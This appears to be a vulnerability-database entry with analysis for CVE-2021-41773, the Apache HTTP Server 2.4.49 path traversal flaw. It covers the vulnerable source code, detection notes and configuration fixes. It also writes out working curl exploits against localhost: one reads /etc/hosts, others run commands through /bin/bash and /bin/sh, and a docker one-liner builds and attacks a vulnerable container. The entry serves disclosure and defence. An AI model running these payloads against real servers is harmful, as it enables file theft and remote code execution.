Very High
CVE-2021-41773
CVE-2021-41773
Description
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration “require all denied”, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.
Add Assessment
Technical Analysis
Apache doesn’t typically run with root privileges in most environments so the value of this vulnerability will largely be in using it to leak application-specific secrets such as signing keys, database connection strings, source code etc. Path traversal vulnerabilities are among the easiest to exploit and involve no type of corruption, making them very reliable and safe to use multiple times.
There will likely be evidence within the Apache access logs of exploitation. Filtering on the HTTP status code could also provide insight into what files the attacker was able to successfully leak.
Technical Analysis
Trivial to detect and use.
Technical Analysis
A July 2024 bulletin from multiple U.S. government agencies indicates that North Korean state-sponsored attackers have demonstrated interest in this vulnerability — not immediately clear whether it was exploited more recently (since it’s been exploited plenty before) or just used in reconnaissance/target selection: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a
CISA KEV also notes this vulnerability has been used in ransomware attacks, so I’m adding that tag as well.
CVSS V3 Severity and Metrics
General Information
Vendors
- apache,
- fedoraproject,
- netapp,
- oracle
Products
- cloud backup -,
- fedora 34,
- fedora 35,
- http server 2.4.49,
- instantis enterprisetrack 17.1,
- instantis enterprisetrack 17.2,
- instantis enterprisetrack 17.3
Metasploit Modules
Exploited in the Wild
References
Advisory
Miscellaneous
Technical Analysis
Threat status: Threat
Attacker utility: Info leak, remote code execution
Description
On October 4, 2021, Apache HTTP Server version 2.4.50 was released with a patch for CVE-2021-41773, an unauthenticated and remote file disclosure vulnerability. The vulnerability arises from the mishandling of URL-encoded path traversal characters in the HTTP GET request. An attacker can read files outside of the server root directory by sending a specially crafted request.
Public exploits are available and the vendor reports the vulnerability has reportedly been exploited in the wild. For more information, see Apache’s advisory here.
Affected products
- Apache HTTP Server version 2.4.49
- Apache HTTP Server version 2.4.50
Rapid7 analysis
The vulnerable code is in server/util.c within the ap_normalize_path function. This function attempts to resolve URL-encoded values and remove path traversal logic from the requested URI. The vulnerability is the result of resolving Unicode values one at a time and attempting to detect traversal logic before all characters have been decoded.
The following is a snippet of the vulnerable code in server/util.c lines 561 – 596
if (path[l] == '.') { /* Remove /./ segments */ if (IS_SLASH_OR_NUL(path[l + 1])) { l++; if (path[l]) { l++; } continue; } /* Remove /xx/../ segments */ if (path[l + 1] == '.' && IS_SLASH_OR_NUL(path[l + 2])) { /* Wind w back to remove the previous segment */ if (w > 1) { do { w--; } while (w && !IS_SLASH(path[w - 1])); } else { /* Already at root, ignore and return a failure * if asked to. */ if (flags & AP_NORMALIZE_NOT_ABOVE_ROOT) { ret = 0; } } /* Move l forward to the next segment */ l += 2; if (path[l]) { l++; } continue; } }
When an attacker uses /.%2e/ in a URI, the logic on line 572 will not recognize %2e as a period because the character has not yet been decoded. Normally, to fix such an issue, the developers would decode the entire URI at once and then scan for path traversal logic. Rapid7 analysts note that Apache did not take this approach.
A simple curl proof of concept follows:
albinolobster@ubuntu:~$ curl -v --path-as-is http://127.0.0.1/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/hosts * Trying 127.0.0.1:80... * Connected to 127.0.0.1 (127.0.0.1) port 80 (#0) > GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/hosts HTTP/1.1 > Host: 127.0.0.1 > User-Agent: curl/7.74.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Tue, 05 Oct 2021 16:54:39 GMT < Server: Apache/2.4.49 (Unix) < Last-Modified: Mon, 04 Oct 2021 19:00:13 GMT < ETag: "dd-5cd8b85df5c38" < Accept-Ranges: bytes < Content-Length: 221 < 127.0.0.1 localhost 127.0.1.1 ubuntu # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters * Connection #0 to host 127.0.0.1 left intact
The vulnerable code was introduced in a 2020 commit, but only made its way into one official release. The HTTP server is only affected when the configuration file is either missing the directory directive for the entire filesystem (e.g. <Directory />) or the filesystem directory directive contains Require all granted. Note that the default configuration of HTTP Server contains a filesystem directory directive containing Require all denied, and is therefore not vulnerable.
Rapid7 researchers examined default Apache configurations packaged with some popular Linux distributions, but none appear to be vulnerable by default. There may be some third-party products using vulnerable configurations, but since the vulnerability is limited to one version of HTTP server, we don’t expect exploitation to be widespread.
Updates
October 5, 2021: On the evening of October 5, 2021 @hackerfantastic posted a proof of concept demonstrating remote code execution using this vulnerability. Remote code execution is possible only when mod_cgi is enabled. Again, mod_cgi is not enabled in the default Apache Server HTTP configuration, but it isn’t an uncommon feature to enable either.
When mod_cgi is enabled, an attacker can execute arbitrary programs via HTTP POST requests. While the initial RCE proof of concept resulted in blind command execution, there have been multiple proofs of concept that coerce the HTTP server into sending the program’s output back to the attacker. We believe the simplest method uses echo -e “\n$(commands) in the POST body:
albinolobster@ubuntu:~$ curl -v -d 'echo -e "\n$(id)"' http://127.0.0.1/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/bash * Trying 127.0.0.1:80... * Connected to 127.0.0.1 (127.0.0.1) port 80 (#0) > POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/bash HTTP/1.1 > Host: 127.0.0.1 > User-Agent: curl/7.74.0 > Accept: */* > Content-Length: 17 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 17 out of 17 bytes * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Wed, 06 Oct 2021 10:16:13 GMT < Server: Apache/2.4.49 (Unix) < Transfer-Encoding: chunked < uid=1(daemon) gid=1(daemon) groups=1(daemon) * Connection #0 to host 127.0.0.1 left intact
Useful exploitation is more difficult on Windows as it’s less conducive to one liners like Unix-like systems. However, Will Dormann did post a tweet that demonstrated popping calc.exe using this vulnerability.
October 7, 2021: On October 7, Apache updated their advisory to note that the patch for CVE-2021-41773 was incomplete, rendering HTTP Server 2.4.50 versions vulnerable when specific, non-default conditions are met. According to their advisory, “an attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.”
CVE-2021-42013 has been assigned to track the incomplete fix for CVE-2021-41773. CVE-2021-42013 has been fixed in HTTP Server version 2.4.51 released October 7, 2021. For more information, see Apache’s advisory.
This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.
Guidance
Organizations should determine if they are using Apache HTTP Server 2.4.49 or 2.4.50 and if they are using vulnerable configurations. If a vulnerable server is discovered, the server’s configuration file should be updated to include the filesystem directory directive with require all denied:
<Directory /> Require all denied </Directory>
If possible, upgrade to HTTP Server 2.4.51 or later as soon as possible. For more information, see Apache’s advisory here.
There is now RCE for this if
mod-cgiis enabledhttps://twitter.com/hackerfantastic/status/1445531829985968137
curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vvCID=`docker run -d -p 8081:80 $(echo -e 'FROM httpd:2.4.49\nRUN sed -i -E "s|all denied|all granted|g; s|#(.* cgid_.*)|\1|g" /usr/local/apache2/conf/httpd.conf' | docker build -q -)` && curl 'localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id' && docker kill $CID